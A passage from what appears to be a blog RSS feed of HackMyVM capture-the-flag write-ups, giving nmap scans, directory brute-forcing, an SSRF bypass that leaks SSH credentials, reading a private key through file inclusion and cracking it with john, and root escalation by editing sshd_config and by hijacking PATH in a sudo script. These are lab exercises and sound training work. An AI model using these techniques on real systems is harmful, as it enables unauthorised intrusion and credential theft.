SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;
SF:\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=abfb225a6c69b259;
SF:\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=1KgRX_Fci-rGge6j5LIyElk
SF:Aqp46MTczNzM2MzU3ODgyMTcyMjg4Mg;\x20Path=/;\x20Expires=Tue,\x2021\x20Ja
SF:n\x202025\x2008:59:38\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEOR
SF:IGIN\r\nDate:\x20Mon,\x2020\x20Jan\x202025\x2008:59:38\x20GMT\r\n\r\n&lt;!
SF:DOCTYPE\x20html&gt;\n&lt;html\x20lang=\'en-US\'\x20class=\'theme-\'&gt;\n&lt;head\x
SF:20data-suburl=\'\'&gt;\n\t&lt;meta\x20charset=\'utf-8\'&gt;\n\t&lt;meta\x20name=\'v
SF:iewport\'\x20content=\'width=device-width,\x20initial-scale=1\'&gt;\n\t&lt;me
SF:ta\x20http-equiv=\'x-ua-compatible\'\x20content=\'ie=edge\'&gt;\n\t&lt;title&gt;
SF:\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20&lt;/title&gt;\n\t&lt;link
SF:\x20rel=\'manifest\'\x20href=\'/manifest\.json\'\x20crossorigin=\'use-c
SF:redentials\'&gt;\n\t&lt;meta\x20name=\'theme-color\'\x20content=\'#6cc644\'&gt;\
SF:n\t&lt;meta\x20name=\'author\'\x20content=\'Gitea\x20-\x20Git\x20with\x20a
SF:\x20cup\x20of\x20tea\'\x20/&gt;\n\t&lt;meta\x20name=\'description\'\x20conten
SF:t=\'Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20pai
SF:nless')%r(Help,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\
SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20B
SF:ad\x20Request')%r(HTTPOptions,1000,'HTTP/1\.0\x20404\x20Not\x20Found\r\
SF:nContent-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en
SF:-US;\x20Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=aa
SF:35213287ba9b56;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=ibf5qw0V
SF:W54yX8vVkKfbkR8gck06MTczNzM2MzU3ODgzNzkzMjYzOA;\x20Path=/;\x20Expires=T
SF:ue,\x2021\x20Jan\x202025\x2008:59:38\x20GMT;\x20HttpOnly\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2020\x20Jan\x202025\x2008:59:38\x
SF:20GMT\r\n\r\n&lt;!DOCTYPE\x20html&gt;\n&lt;html\x20lang=\'en-US\'\x20class=\'the
SF:me-\'&gt;\n&lt;head\x20data-suburl=\'\'&gt;\n\t&lt;meta\x20charset=\'utf-8\'&gt;\n\t&lt;m
SF:eta\x20name=\'viewport\'\x20content=\'width=device-width,\x20initial-sc
SF:ale=1\'&gt;\n\t&lt;meta\x20http-equiv=\'x-ua-compatible\'\x20content=\'ie=edg
SF:e\'&gt;\n\t&lt;title&gt;Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x
SF:20a\x20cup\x20of\x20tea\x20&lt;/title&gt;\n\t&lt;link\x20rel=\'manifest\'\x20hre
SF:f=\'/manifest\.json\'\x20crossorigin=\'use-credentials\'&gt;\n\t&lt;meta\x20n
SF:ame=\'theme-color\'\x20content=\'#6cc644\'&gt;\n\t&lt;meta\x20name=\'author\'
SF:\x20content=\'Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\'\x20/
SF:&gt;\n\t&lt;meta\x20name=\'description\'\x20content=\'Gitea\x20\(Git\x20with\
SF:x20a\x20c');
MAC Address: 08:00:27:B1:96:9A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.94 seconds

```

Ports 80 and 3000 are both HTTP services.

# 2. Reconnaissance

Port 80 is a welcome page with a script.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_logan2.html</guid><pubDate>Thu, 20 Mar 2025 08:13:53 +0000</pubDate></item><item><title>hmv_Leet笔记</title><link>https://7r1UMPH.github.io/post/hmv_Leet-bi-ji.html</link><description># hmv_Leet Notes

**Target**: https://hackmyvm.eu/machines/machine.php?vm=Leet

**Difficulty**: red

**Target IP**: 192.168.205.208
**Local IP**: 192.168.205.141

# 1. Port Enumeration and Service Detection

Use `nmap` to scan the target IP for open ports:

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.208
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 14:28 CST
Nmap scan report for 192.168.205.208
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
7777/tcp open  http    Werkzeug httpd 3.0.1 (Python 3.11.2)
MAC Address: 08:00:27:39:2C:58 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.17 seconds
```

Port 7777 is a web service, and it runs on Python 3.11.2, so it is probably meant to test SSTI; let's take a look at the page.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Leet-bi-ji.html</guid><pubDate>Thu, 20 Mar 2025 08:12:52 +0000</pubDate></item><item><title>hmv_jan</title><link>https://7r1UMPH.github.io/post/hmv_jan.html</link><description># 0. Introduction

Target: https://hackmyvm.eu/machines/machine.php?vm=jan
Difficulty: green
Target IP: 192.168.205.136
Local IP: 192.168.205.128

# 1. Scan

Start with nmap

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -A 192.168.205.136
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-03 12:40 CST
Nmap scan report for 192.168.205.136
Host is up (0.00023s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey: 
|   256 2c:0b:57:a2:b3:e2:0f:6a:c0:61:f2:b7:1f:56:b4:42 (ECDSA)
|_  256 45:97:b0:2b:48:9b:4a:36:8e:db:44:bd:3f:15:cf:32 (ED25519)
8080/tcp open  http    Golang net/http server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Date: Mon, 03 Feb 2025 04:40:49 GMT
|     Content-Length: 45
|     Content-Type: text/plain; charset=utf-8
|     Welcome to our Public Server. Maybe Internal.
|   GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   OfficeScan: 
|     HTTP/1.1 400 Bad Request: missing required Host header
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request: missing required Host header
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.95%I=7%D=2/3%Time=67A048E1%P=x86_64-pc-linux-gnu%r(Get
SF:Request,A2,'HTTP/1\.0\x20200\x20OK\r\nDate:\x20Mon,\x2003\x20Feb\x20202
SF:5\x2004:40:49\x20GMT\r\nContent-Length:\x2045\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\n\r\nWelcome\x20to\x20our\x20Public\x20Server
SF:\.\x20Maybe\x20Internal\.')%r(HTTPOptions,A2,'HTTP/1\.0\x20200\x20OK\r\
SF:nDate:\x20Mon,\x2003\x20Feb\x202025\x2004:40:49\x20GMT\r\nContent-Lengt
SF:h:\x2045\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\nWelcom
SF:e\x20to\x20our\x20Public\x20Server\.\x20Maybe\x20Internal\.')%r(RTSPReq
SF:uest,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pl
SF:ain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Requ
SF:est')%r(FourOhFourRequest,A2,'HTTP/1\.0\x20200\x20OK\r\nDate:\x20Mon,\x
SF:2003\x20Feb\x202025\x2004:40:49\x20GMT\r\nContent-Length:\x2045\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\nWelcome\x20to\x20our\x
SF:20Public\x20Server\.\x20Maybe\x20Internal\.')%r(Socks5,67,'HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8
SF:\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request')%r(GenericLines,
SF:67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request')
SF:%r(Help,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R
SF:equest')%r(SSLSessionReq,67,'HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request')%r(LPDString,67,'HTTP/1\.1\x20400\x20Bad\x20Re
SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x
SF:20close\r\n\r\n400\x20Bad\x20Request')%r(SIPOptions,67,'HTTP/1\.1\x2040
SF:0\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\
SF:nConnection:\x20close\r\n\r\n400\x20Bad\x20Request')%r(OfficeScan,A3,'H
SF:TTP/1\.1\x20400\x20Bad\x20Request:\x20missing\x20required\x20Host\x20he
SF:ader\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request:\x20missing\x20required\x20Host\x20
SF:header');
MAC Address: 08:00:27:3A:49:D7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms 192.168.205.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.01 seconds
                                                                             
```

Port 8080 cannot be detected with the -sT and -sS options, so I recommend not using them.

# 2. Reconnaissance

```
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.136:8080/                            
Welcome to our Public Server. Maybe Internal.                                                                                                                                    
```

Directory brute-forcing

```
┌──(kali㉿kali)-[~/test]
└─$ feroxbuster -u http://192.168.205.136:8080 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,md,txt
                                                                                                                                    
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben 'epi' Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.205.136:8080
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, md, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET        1l        7w       45c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                                   
400      GET        1l        3w       24c http://192.168.205.136:8080/redirect
200      GET        2l        2w       16c http://192.168.205.136:8080/robots.txt
[####################] - 54s   598005/598005  0s      found:2       errors:0    
[####################] - 54s   598005/598005  11090/s http://192.168.205.136:8080/           
```

Explore a bit

```
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.136:8080/redirect
Parameter 'url' needed.
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.136:8080/robots.txt
/redirect
/credz                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.136:8080/credz   
Only accessible internally.                                                                                                                                    
```

So far the intended path seems to be reaching /credz via /redirect; let's try it.

```
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.136:8080/credz   
Only accessible internally.                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt
Only accessible internally.                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ curl -I http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt
HTTP/1.1 200 OK
Date: Mon, 03 Feb 2025 04:47:07 GMT
Content-Length: 27
Content-Type: text/plain; charset=utf-8
```

I tried quite a few bypass methods here, which I won't write out; the correct method is

```
┌──(kali㉿kali)-[~/test]
└─$ curl 'http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt&amp;url=192.168.205.136:8080/credz'
                                         
```

It returns blank, and blank means there is something to work with.

```
┌──(kali㉿kali)-[~/test]
└─$ curl 'http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt&amp;url=127.0.0.1:8080/credz'
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ curl 'http://192.168.205.136:8080/redirect?url=127.0.0.1:8080/robots.txt&amp;url=/credz'            
ssh/EazyLOL                                                                                                                                     
```

Log in

```
┌──(kali㉿kali)-[~/test]
└─$ ssh ssh@192.168.205.136
The authenticity of host '192.168.205.136 (192.168.205.136)' can't be established.
ED25519 key fingerprint is SHA256:tkz/GarJpLwrGFZmgpweGf70u9znUcXycaHKGhfPRCc.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:3: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.205.136' (ED25519) to the list of known hosts.
ssh@192.168.205.136's password: 
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See &lt;https://wiki.alpinelinux.org/&gt;.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

jan:~$ id
uid=1000(ssh) gid=1000(ssh) groups=1000(ssh)
```

# 4. Privilege Escalation

```
jan:~$ ls -al
total 12
drwxr-sr-x    2 ssh      ssh           4096 Jan 28 09:27 .
drwxr-xr-x    3 root     root          4096 Jan 28 09:08 ..
lrwxrwxrwx    1 root     ssh              9 Jan 28 09:27 .ash_history -&gt; /dev/null
-rw-------    1 ssh      ssh             22 Jan 28 09:20 user.txt
jan:~$ sudo -l
Matching Defaults entries for ssh on jan:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for ssh:
    Defaults!/usr/sbin/visudo env_keep+='SUDO_EDITOR EDITOR VISUAL'

User ssh may run the following commands on jan:
    (root) NOPASSWD: /sbin/service sshd restart
```

Most likely this means editing the SSH configuration file; let's check whether we have permission.

```
jan:~$ ls -al /etc/ssh/sshd_config
-rw-rw-rw-    1 root     root          3355 Jan 28 09:01 /etc/ssh/sshd_config
```

We do, so we generate a key pair and log in as root with the key.

```
jan:~$ ssh-keygen -t rsa 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ssh/.ssh/id_rsa): 
Created directory '/home/ssh/.ssh'.
Enter passphrase for '/home/ssh/.ssh/id_rsa' (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/ssh/.ssh/id_rsa
Your public key has been saved in /home/ssh/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:FNapkUoVgyB2BhdqurZup7sNDvaCmQhWvV/OC5czxA8 ssh@jan
The key's randomart image is:
+---[RSA 3072]----+
|  +.*o o*+ .     |
| . *  o.ooo      |
|  o .. ..o       |
| o . ...o        |
|. .   . SE       |
|.o   .  ..+      |
|B*    ..+= .     |
|Xo=.   .ooo      |
|oB*o     ..      |
+----[SHA256]-----+

jan:~$ cp .ssh/id_rsa.pub /tmp/authorized_keys
jan:~$ chmod 600 /tmp/authorized_keys 
jan:~$ ls -la /tmp/
total 8
drwxrwxrwt    4 root     root           100 Feb  3 04:56 .
drwxr-xr-x   21 root     root          4096 Jan 28 09:01 ..
drwxrwxrwt    2 root     root            40 Feb  3 04:39 .ICE-unix
drwxrwxrwt    2 root     root            40 Feb  3 04:39 .X11-unix
-rw-------    1 ssh      ssh            561 Feb  3 04:56 authorized_keys

jan:~$ vi /etc/ssh/sshd_config
```

![image-20250331191252272](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331191252331.png)

```
jan:~$ sudo /sbin/service sshd restart
 * Stopping sshd ...                                                                                                             [ ok ]
 * Starting sshd ...                                                                                                             [ ok ]
jan:~$ ssh root@127.0.0.1
/etc/ssh/ssh_config: line 23: Bad configuration option: banner
/etc/ssh/ssh_config: terminating, 1 bad configuration options
```

Banner should also allow privilege escalation, but I'll ignore it.

```
jan:~$ vi /etc/ssh/ssh_config
```

![image-20250331191302680](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331191302731.png)

```
jan:~$ ssh root@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:tkz/GarJpLwrGFZmgpweGf70u9znUcXycaHKGhfPRCc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts.
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See &lt;https://wiki.alpinelinux.org/&gt;.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

jan:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
```

# 5. Second Method

![image-20250331191312627](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250331191312690.png)

🔗https://blog.kongyu204.com/%E5%AE%89%E5%85%A8/%E9%9D%B6%E6%9C%BA/hackmyvm_jan/#%E6%8F%90%E6%9D%83

I haven't tried this method; give it a try yourself.
</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_jan.html</guid><pubDate>Thu, 20 Mar 2025 08:11:50 +0000</pubDate></item><item><title>hmv_Immortal</title><link>https://7r1UMPH.github.io/post/hmv_Immortal.html</link><description># hmv_Immortal

# 0. Introduction

**Target**: [hackmyvm - Immortal](https://hackmyvm.eu/machines/machine.php?vm=Immortal)
**Difficulty**: yellow
**Target IP**: 192.168.205.223
**Local IP**: 192.168.205.141

---

# 1. Scan

Start with `nmap` and probe the ports first

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap 192.168.205.223
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 12:20 CST
Nmap scan report for 192.168.205.223
Host is up (0.00042s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:13:BB:B5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
```

Nothing much to say; since there is an FTP service, try **anonymous login** first

---

# 2. Reconnaissance

## port 21

```bash
┌──(kali㉿kali)-[~/test]
└─$ ftp 192.168.205.223     
Connected to 192.168.205.223.
220 (vsFTPd 3.0.3)
Name (192.168.205.223:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls -la
229 Entering Extended Passive Mode (|||52564|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Feb 27  2024 .
drwxr-xr-x    2 0        115          4096 Feb 27  2024 ..
-rw-r--r--    1 0        0             504 Feb 27  2024 message.txt
226 Directory send OK.
ftp&gt; mget message.txt
mget message.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||10512|)
150 Opening BINARY mode data connection for message.txt (504 bytes).
100% |*****************************************************************************************|   504      825.81 KiB/s    00:00 ETA
226 Transfer complete.
504 bytes received in 00:00 (429.10 KiB/s)
ftp&gt; exit
221 Goodbye.                               
```

View the message.txt file

```bash
┌──(kali㉿kali)-[~/test]
└─$ cat message.txt 
Hey guys!
I made it, after all this time. That's right guys, the great precious immortality. The one coveted by all and achieved by none. Favoured by all and owned by none. 
Now we have to be careful guys, we have to hide this from the world, from governments and other dangerous institutions. 
They may even have already heard about our achievement, they are everywhere! That's why I have decided to strengthen the security of the server. What if they try to hack us!!! 
Wishing you a long life, David.
  
Hey guys!
After all this time, I made it.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Immortal.html</guid><pubDate>Thu, 20 Mar 2025 08:10:48 +0000</pubDate></item><item><title>hmv_friendly2</title><link>https://7r1UMPH.github.io/post/hmv_friendly2.html</link><description># hmv_friendly2

# 0. Introduction

**Target**: [hackmyvm - friendly2](https://hackmyvm.eu/machines/machine.php?vm=friendly2)
**Difficulty**: green
**Target IP**: 192.168.205.138
**Local IP**: 192.168.205.141

# 1. Scan

Start with `nmap`

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-24 09:37 CST
Nmap scan report for 192.168.205.138
Host is up (0.00057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:0C:8F:A4 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds

```

# 2. Reconnaissance

![Image](https://github.com/user-attachments/assets/0db9dabd-fe97-4b10-ac8c-fea7bb327606)

Try brute-forcing directories

```bash
┌──(kali㉿kali)-[~/test]
└─$ feroxbuster -u 'http://192.168.205.138' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,md
                                                                                                                                    
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben 'epi' Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.205.138
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, txt, md]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                                   
403      GET        9l       28w      280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                                   
200      GET       91l      262w     2698c http://192.168.205.138/
301      GET        9l       28w      319c http://192.168.205.138/assets =&gt; http://192.168.205.138/assets/
301      GET        9l       28w      318c http://192.168.205.138/tools =&gt; http://192.168.205.138/tools/
200      GET       91l      262w     2698c http://192.168.205.138/index.html
200      GET     1710l     9966w   851305c http://192.168.205.138/assets/keyboard.png
200      GET      644l     3260w   244133c http://192.168.205.138/assets/monitor.png
200      GET     1965l    11601w   977099c http://192.168.205.138/assets/laptop.png
200      GET       24l      148w     6861c http://192.168.205.138/assets/sirena.gif
301      GET        9l       28w      328c http://192.168.205.138/tools/documents =&gt; http://192.168.205.138/tools/documents/
200      GET       29l       99w      813c http://192.168.205.138/tools/index.html
200      GET       35l      101w      841c http://192.168.205.138/tools/documents/monitor.html
200      GET       50l      126w     1169c http://192.168.205.138/tools/documents/keyboard.html
200      GET       35l      101w      879c http://192.168.205.138/tools/documents/laptop.html
[####################] - 2m    622895/622895  0s      found:13      errors:1      
[####################] - 2m    311410/311410  2719/s  http://192.168.205.138/ 
[####################] - 2s    311410/311410  184157/s http://192.168.205.138/assets/ =&gt; Directory listing (add --scan-dir-listings to scan)
[####################] - 2m    311410/311410  2662/s  http://192.168.205.138/tools/ 
[####################] - 0s    311410/311410  7077500/s http://192.168.205.138/tools/documents/ =&gt; Directory listing (add --scan-dir-listings to scan)
```

The `/tools/` directory is the interesting one

![Image](https://github.com/user-attachments/assets/4cecf106-19df-416e-b3c1-2da93f1dcbf6)

There is what looks like a file inclusion parameter, so we try appending a path

![Image](https://github.com/user-attachments/assets/07421b64-12cb-4fe0-b6e8-48f94239bddc)

Next, check whether a **PHP filter chain** works

![Image](https://github.com/user-attachments/assets/0788d850-d370-4605-9661-192ba52e50bb)

It doesn't, so we read the user's SSH private key through the inclusion instead

![Image](https://github.com/user-attachments/assets/286bfaa9-f0e2-4543-9ce7-711916d35160)

```bash
┌──(kali㉿kali)-[~/test]
└─$ vim id_rsa 
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ chmod 600 id_rsa
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ ssh gh0st@192.168.205.138 -i id_rsa
The authenticity of host '192.168.205.138 (192.168.205.138)' can't be established.
ED25519 key fingerprint is SHA256:YDW5zhbCol/1L6a3swXHsFDV6D3tUVbC09Ch+bxLR08.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.205.138' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 

                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ ssh2john id_rsa &gt; hash                             
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ john hash --show                                   
id_rsa:celtic

1 password hash cracked, 0 left
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ ssh gh0st@192.168.205.138 -i id_rsa                
Enter passphrase for key 'id_rsa': 
Linux friendly2 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gh0st@friendly2:~$ id
uid=1001(gh0st) gid=1001(gh0st) groups=1001(gh0st)

```

# 3. Privilege Escalation

```bash
gh0st@friendly2:~$ sudo -l
Matching Defaults entries for gh0st on friendly2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gh0st may run the following commands on friendly2:
    (ALL : ALL) SETENV: NOPASSWD: /opt/security.sh
gh0st@friendly2:~$ cat /opt/security.sh
#!/bin/bash

echo "Enter the string to encode:"
read string

# Validate that the string is no longer than 20 characters
if [[ ${#string} -gt 20 ]]; then
  echo "The string cannot be longer than 20 characters."
  exit 1
fi

# Validate that the string does not contain special characters
if echo "$string" | grep -q '[^[:alnum:] ]'; then
  echo "The string cannot contain special characters."
  exit 1
fi

sus1="A-Za-z"
sus2="N-ZA-Mn-za-m"

encoded_string=$(echo "$string" | tr $sus1 $sus2)

echo "Original string: $string"
echo "Encoded string: $encoded_string"
gh0st@friendly2:~$ ls -la /opt/
total 16
drwxr-xr-x  3 root root 4096 Apr 29  2023 .
drwxr-xr-x 19 root root 4096 Apr 27  2023 ..
drwxr-xr-x  2 root root 4096 Apr 29  2023 0-day
-rwxr-xr-x  1 root root  561 Apr 29  2023 security.sh

```

The script accepts input of at most 20 characters with no special characters and ROT13-encodes it. It calls `grep` and `tr` by bare name rather than absolute path, and the sudo rule carries the `SETENV` tag, so we only need to hand it our own `PATH` on the sudo command line and it will run a `grep` we control.

```bash
gh0st@friendly2:/tmp$ echo 'chmod u+s /bin/bash' &gt; grep
gh0st@friendly2:/tmp$ chmod +x grep 
gh0st@friendly2:/tmp$ ls -la /bin/bash
